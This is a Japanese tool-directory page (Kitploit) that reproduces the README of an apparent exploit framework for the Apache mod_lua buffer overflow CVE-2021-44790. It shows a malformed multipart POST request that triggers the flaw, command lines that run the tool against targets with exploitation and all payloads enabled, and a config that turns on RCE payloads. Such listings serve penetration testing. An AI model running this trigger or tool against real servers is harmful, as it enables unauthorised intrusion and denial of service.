Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790 — Apache HTTP Server 2.4.x mod_luaバッファオーバーフロー(CVE-2021-44790)- フィンガープリンティング、マルチステージスキャン、プラグインアーキテクチャ、プロフェッショナルレポート、スクリーンショットキャプチャ、SQLiteデータベース、95%以上の信頼度検出を備えた高度なエクスプロイトフレームワーク。著者:Sudeepa Wanigarathna。 | Kitploit
ツール/GitHubGitHub/cerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790
ウェブ脆弱性スキャナーエクスプロイトフレームワークエクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubcerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790

Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

Apache HTTP Server 2.4.x mod_luaバッファオーバーフロー(CVE-2021-44790)- フィンガープリンティング、マルチステージスキャン、プラグインアーキテクチャ、プロフェッショナルレポート、スクリーンショットキャプチャ、SQLiteデータベース、95%以上の信頼度検出を備えた高度なエクスプロイトフレームワーク。著者:Sudeepa Wanigarathna。

リポジトリを見る
1301ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🔥 CVE-2021-44790 - Apache mod_lua バッファオーバーフローエクスプロイト

Version Python License CVE Apache CVSS Author


📋 概要

Apache mod_lua バッファオーバーフローエクスプロイトは、Apache HTTP Server 2.4.x の mod_lua モジュールに存在する重大なバッファオーバーフロー脆弱性 CVE-2021-44790 を対象とした、高度なエンタープライズグレードのエクスプロイトプラットフォームです。このフレームワークは、包括的なフィンガープリンティング、インテリジェントなスクリプト発見、マルチステージスキャン、プロフェッショナルなレポート機能を備え、95%以上の信頼度で検出します。

⚡ 主な機能

機能説明
🔍 高度なフィンガープリンティングApacheバージョン、mod_lua、OS、アーキテクチャ、WAF、CDN、コンテナ、クラウドプロバイダーの検出
🎯 インテリジェントな発見robots.txt、sitemap、HTML解析、JavaScript抽出など7種類以上の発見手法
💥 マルチステージスキャン接続 → フィンガープリント → 発見 → 検証 → エクスプロイト → レポート
🧩 拡張可能なプラグインシステム将来のCVEに対応するための簡単なプラグイン開発
🌐 スマートHTTPエンジン接続プール、リトライ、HTTP/2サポート、レート制限
📊 包括的なレポートインタラクティブなダッシュボード付きのJSON、HTML、Markdown、PDF
🎨 美しいターミナルUIプログレスバー、テーブル、色分け出力を備えたRichライブラリ
💾 リサーチデータベース完全なスキャン履歴とクエリサポートを備えたSQLiteストレージ
📸 スクリーンショット取得証拠収集のためのWebページの自動スクリーンショット
🚀 高性能20以上の同時スレッド、100以上の接続プール

🎯 脆弱性の詳細

属性値
CVE IDCVE-2021-44790
脆弱性バッファオーバーフロー(整数アンダーフロー)
影響を受けるソフトウェアApache HTTP Server 2.4.0 ~ 2.4.51
修正バージョンApache HTTP Server 2.4.52以降
コンポーネントmod_lua モジュール
攻撃ベクトルネットワーク(リモート)
CVSSスコア9.8(緊急)
機密性への影響高
完全性への影響高
可用性への影響高
エクスプロイトの成熟度概念実証(PoC)利用可能

技術的説明

この脆弱性は、mod_lua モジュールが multipart/form-data リクエストを処理する際に存在します。lua_request_parsebody() 関数の整数アンダーフローにより、ヒープベースのバッファオーバーフローが発生し、リモートコード実行につながる可能性があります。

POST /process.lua HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=4

4
Content-Disposition: form-data; name="name"

0
4

📸 スクリーンショット

メインインターフェースフィンガープリント結果
スキャン進行状況HTMLレポートダッシュボード

🚀 クイックスタート

インストール

# Clone the repository
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 exploit.py --version

基本的な使用方法

# Quick vulnerability scan
python3 exploit.py http://target.com

# Verbose scan with exploitation
python3 exploit.py https://target.com --exploit --verbose

# Generate all reports
python3 exploit.py http://target.com --report all

# Research mode with database
python3 exploit.py http://target.com --research

📋 詳細な使用方法

コマンドラインオプション

python3 exploit.py [TARGET] [OPTIONS]
オプション説明例
TARGETターゲットURLhttp://target.com
--config FILE設定ファイル--config config.yaml
--threads Nスレッド数--threads 30
--timeout Nリクエストタイムアウト(秒)--timeout 15
--proxy URLプロキシURL--proxy http://127.0.0.1:8080
--verbose詳細出力--verbose
--scan-onlyエクスプロイトなしでスキャンのみ実行--scan-only
--exploitエクスプロイトを有効化--exploit
--all-payloadsすべてのペイロードを使用--all-payloads
--report FORMATレポート形式(json/html/markdown/all)--report all
--output DIR出力ディレクトリ--output /path/to/reports/
--researchリサーチモードを有効化--research
--database FILEデータベースパス--database luastorm.db
--screenshotスクリーンショットを撮影--screenshot
--batch FILEターゲットを含むバッチファイル--batch targets.txt
--query SQLデータベースクエリを実行--query "SELECT * FROM targets"

使用例

1. 基本的な脆弱性評価

python3 exploit.py https://example.com --verbose --report all

2. 企業環境スキャン

python3 exploit.py https://internal-server.com \
    --proxy http://proxy.corp.com:8080 \
    --threads 10 \
    --timeout 15 \
    --verbose \
    --report all \
    --output /var/log/security/

3. 本格的なペネトレーションテスト

python3 exploit.py https://client.com \
    --threads 30 \
    --timeout 10 \
    --exploit \
    --all-payloads \
    --report all \
    --screenshot \
    --research \
    --verbose \
    --output /pentest/client_name/

4. バッチスキャン

python3 exploit.py --batch targets.txt --config config.yaml

5. データベースクエリ

# Show all vulnerable targets
python3 exploit.py --query "SELECT * FROM targets WHERE vulnerable=1"

# Get statistics
python3 exploit.py --query "SELECT COUNT(*) as total, SUM(vulnerable) as vulnerable FROM targets"

⚙️ 設定

config.yaml

# ----------------------------------------------------------------------------
# LuaStorm Exploit Framework - Configuration File
# ----------------------------------------------------------------------------

# Scan Settings
threads: 20                    # Concurrent threads
timeout: 10                    # Request timeout in seconds
retries: 3                     # Number of retry attempts
rate_limit: 10                 # Requests per second
max_depth: 3                   # Directory traversal depth
follow_redirects: true         # Follow HTTP redirects
verify_ssl: false              # Verify SSL certificates

# Network Settings
proxy: null                    # Proxy URL
http2: true                    # Enable HTTP/2 support
user_agent: random             # User-Agent (random/specific)
save_packets: false            # Save raw network packets

# Analysis Settings
research_mode: true            # Enable research database
verbose: false                 # Verbose output
scan_only: false               # Scan without exploitation
exploit: false                 # Enable exploitation
all_payloads: false            # Use all payloads

# Payload Settings
payloads:
  detection: true
  memory: true
  rce: true
  dos: false

# Report Settings
report_json: true
report_html: true
report_markdown: true
report_pdf: false
screenshot: false
reports_dir: reports

# Database Settings
database_path: luastorm.db
database_retention: 365

# Directory Settings
logs_dir: logs
screenshots_dir: screenshots

📊 レポート

ツールをダウンロード